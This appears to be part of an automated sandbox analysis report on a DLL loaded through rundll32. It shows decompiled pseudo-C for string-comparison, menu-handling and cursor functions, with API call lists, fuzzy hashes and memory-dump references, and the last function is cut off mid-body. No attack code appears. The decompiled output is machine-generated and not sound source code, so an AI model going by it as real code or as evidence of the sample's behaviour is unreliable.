                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                        • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                        • API String ID: 1437655972-4218389149
                                                                        • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                        • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C425 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}





























                                                                        0x1001c425
                                                                        0x1001c427
                                                                        0x1001c42c
                                                                        0x1001c431
                                                                        0x1001c436
                                                                        0x1001c439
                                                                        0x1001c43d
                                                                        0x1001c43e
                                                                        0x1001c444
                                                                        0x1001c459
                                                                        0x1001c463
                                                                        0x1001c469
                                                                        0x1001c46c
                                                                        0x1001c46e
                                                                        0x1001c46e
                                                                        0x1001c45b
                                                                        0x1001c45b
                                                                        0x1001c45b
                                                                        0x1001c459
                                                                        0x1001c47b
                                                                        0x1001c489
                                                                        0x1001c489
                                                                        0x1001c48c
                                                                        0x1001c491
                                                                        0x1001c497
                                                                        0x1001c49d
                                                                        0x1001c49d
                                                                        0x1001c4a0
                                                                        0x1001c4a8
                                                                        0x1001c4ab
                                                                        0x1001c6ea
                                                                        0x1001c6ed
                                                                        0x1001c6f0
                                                                        0x1001c6f2
                                                                        0x1001c6f7
                                                                        0x1001c6f7
                                                                        0x1001c6fa
                                                                        0x1001c6fd
                                                                        0x1001c6ff
                                                                        0x1001c701
                                                                        0x1001c701
                                                                        0x1001c710
                                                                        0x1001c712
                                                                        0x1001c715
                                                                        0x1001c71b
                                                                        0x1001c71d
                                                                        0x1001c768
                                                                        0x1001c780
                                                                        0x1001c782
                                                                        0x1001c784
                                                                        0x1001c786
                                                                        0x1001c787
                                                                        0x1001c78c
                                                                        0x1001c78f
                                                                        0x1001c795
                                                                        0x00000000
                                                                        0x1001c784
                                                                        0x1001c71f
                                                                        0x1001c721
                                                                        0x1001c726
                                                                        0x1001c727
                                                                        0x1001c72a
                                                                        0x1001c72b
                                                                        0x1001c734
                                                                        0x1001c736
                                                                        0x1001c738
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c73a
                                                                        0x1001c73c
                                                                        0x1001c741
                                                                        0x1001c742
                                                                        0x1001c745
                                                                        0x1001c746
                                                                        0x1001c747
                                                                        0x1001c74f
                                                                        0x1001c752
                                                                        0x1001c754
                                                                        0x1001c75f
                                                                        0x1001c765
                                                                        0x00000000
                                                                        0x1001c765
                                                                        0x1001c756
                                                                        0x1001c757
                                                                        0x1001c75c
                                                                        0x00000000
                                                                        0x1001c4b9
                                                                        0x1001c4bb
                                                                        0x1001c717
                                                                        0x1001c717
                                                                        0x1001c798
                                                                        0x1001c7a8
                                                                        0x1001c7a8
                                                                        0x1001c4c1
                                                                        0x1001c4c4
                                                                        0x1001c4c7
                                                                        0x1001c4cd
                                                                        0x1001c4cf
                                                                        0x1001c4d5
                                                                        0x1001c4d5
                                                                        0x1001c4db
                                                                        0x1001c4e8
                                                                        0x1001c4f1
                                                                        0x1001c4f3
                                                                        0x1001c796
                                                                        0x1001c796
                                                                        0x00000000
                                                                        0x1001c796
                                                                        0x1001c4f9
                                                                        0x1001c4fc
                                                                        0x1001c50d
                                                                        0x1001c513
                                                                        0x1001c515
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c51b
                                                                        0x1001c51e
                                                                        0x1001c54b
                                                                        0x1001c54e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c550
                                                                        0x1001c553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c559
                                                                        0x1001c55c
                                                                        0x1001c560
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c569
                                                                        0x1001c56b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c574
                                                                        0x1001c576
                                                                        0x1001c578
                                                                        0x1001c582
                                                                        0x1001c582
                                                                        0x1001c584
                                                                        0x1001c587
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c589
                                                                        0x1001c57a
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c520
                                                                        0x1001c523
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c525
                                                                        0x1001c528
                                                                        0x1001c52c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c531
                                                                        0x1001c533
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c538
                                                                        0x1001c53a
                                                                        0x1001c53c
                                                                        0x1001c542
                                                                        0x1001c542
                                                                        0x1001c544
                                                                        0x1001c547
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c549
                                                                        0x1001c53e
                                                                        0x1001c540
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c540
                                                                        0x1001c52e
                                                                        0x1001c4fe
                                                                        0x1001c500
                                                                        0x00000000
                                                                        0x1001c500
                                                                        0x1001c4ea
                                                                        0x1001c4ea
                                                                        0x00000000
                                                                        0x1001c58e
                                                                        0x1001c58e
                                                                        0x1001c5a1
                                                                        0x1001c5a3
                                                                        0x1001c5a6
                                                                        0x1001c5a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c5ae
                                                                        0x1001c5ba
                                                                        0x1001c5bf
                                                                        0x1001c5c4
                                                                        0x1001c5c7
                                                                        0x1001c5e9
                                                                        0x1001c5ec
                                                                        0x1001c5ee
                                                                        0x1001c608
                                                                        0x1001c614
                                                                        0x1001c61a
                                                                        0x1001c61c
                                                                        0x1001c6d3
                                                                        0x1001c6d3
                                                                        0x1001c6d7
                                                                        0x1001c6d9
                                                                        0x1001c6dc
                                                                        0x1001c6e1
                                                                        0x1001c6e2
                                                                        0x00000000
                                                                        0x1001c6e2
                                                                        0x1001c637
                                                                        0x1001c639
                                                                        0x1001c63c
                                                                        0x1001c63e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c644
                                                                        0x1001c654
                                                                        0x1001c659
                                                                        0x1001c65c
                                                                        0x1001c65e
                                                                        0x1001c661
                                                                        0x1001c67f
                                                                        0x1001c681
                                                                        0x1001c69a
                                                                        0x1001c6a7
                                                                        0x1001c6ad
                                                                        0x1001c6af
                                                                        0x1001c6c3
                                                                        0x1001c6c3
                                                                        0x1001c6c6
                                                                        0x1001c6ca
                                                                        0x1001c6cc
                                                                        0x1001c6cd
                                                                        0x1001c6d2
                                                                        0x00000000
                                                                        0x1001c683
                                                                        0x1001c68d
                                                                        0x1001c68f
                                                                        0x1001c691
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x1001c5f0
                                                                        0x1001c5f4
                                                                        0x1001c5f9
                                                                        0x1001c5fa
                                                                        0x1001c5fd
                                                                        0x1001c5ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x1001c5ee
                                                                        0x1001c4db

                                                                        APIs
                                                                        • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                        • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                        • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                        • String ID:
                                                                        • API String ID: 1773772771-0
                                                                        • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                        • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

























                                                                        0x10032113
                                                                        0x10032118
                                                                        0x1003211b
                                                                        0x10032125
                                                                        0x1003212f
                                                                        0x10032132
                                                                        0x10032149
                                                                        0x1003214d
                                                                        0x10032152
                                                                        0x10032160
                                                                        0x10032174
                                                                        0x100321bd
                                                                        0x100321c0
                                                                        0x100321c6
                                                                        0x100321cc
                                                                        0x100321cf
                                                                        0x1003227f
                                                                        0x10032280
                                                                        0x00000000
                                                                        0x10032280
                                                                        0x100321db
                                                                        0x100321e1
                                                                        0x100321e5
                                                                        0x100321e8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100321f1
                                                                        0x1003221b
                                                                        0x10032223
                                                                        0x10032231
                                                                        0x1003222c
                                                                        0x1003222e
                                                                        0x1003222e
                                                                        0x10032233
                                                                        0x10032234
                                                                        0x10032237
                                                                        0x10032238
                                                                        0x10032240
                                                                        0x10032246
                                                                        0x1003224b
                                                                        0x1003226a
                                                                        0x1003226a
                                                                        0x1003226d
                                                                        0x00000000
                                                                        0x1003226d
                                                                        0x10032250
                                                                        0x10032265
                                                                        0x10032260
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032262
                                                                        0x10032262
                                                                        0x00000000
                                                                        0x10032265
                                                                        0x100321f8
                                                                        0x100321ff
                                                                        0x10032202
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032209
                                                                        0x1003220d
                                                                        0x10032210
                                                                        0x10032217
                                                                        0x00000000
                                                                        0x10032217
                                                                        0x10032270
                                                                        0x10032270
                                                                        0x10032273
                                                                        0x10032276
                                                                        0x00000000
                                                                        0x100321db
                                                                        0x10032178
                                                                        0x1003217f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032186
                                                                        0x1003218a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003218d
                                                                        0x10032193
                                                                        0x10032197
                                                                        0x1003219a
                                                                        0x100321ba
                                                                        0x100321ba
                                                                        0x00000000
                                                                        0x100321ba
                                                                        0x1003219c
                                                                        0x100321a9
                                                                        0x100321ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100321af
                                                                        0x100321b1
                                                                        0x100321b7
                                                                        0x00000000
                                                                        0x100321b7
                                                                        0x10032162
                                                                        0x00000000
                                                                        0x10032162
                                                                        0x10032139
                                                                        0x1003213a
                                                                        0x1003213d
                                                                        0x1003213e
                                                                        0x10032143
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032143
                                                                        0x10032283

                                                                        APIs
                                                                          • Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                          • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                          • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                        • GetMenu.USER32(?), ref: 10032170
                                                                        • GetMenu.USER32(?), ref: 10032184
                                                                        • GetMenuItemCount.USER32 ref: 1003218D
                                                                        • GetSubMenu.USER32 ref: 1003219E
                                                                        • GetMenuItemCount.USER32 ref: 100321C0
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                        • GetMenuItemCount.USER32 ref: 10032240
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4186786570-0
                                                                        • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                        • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
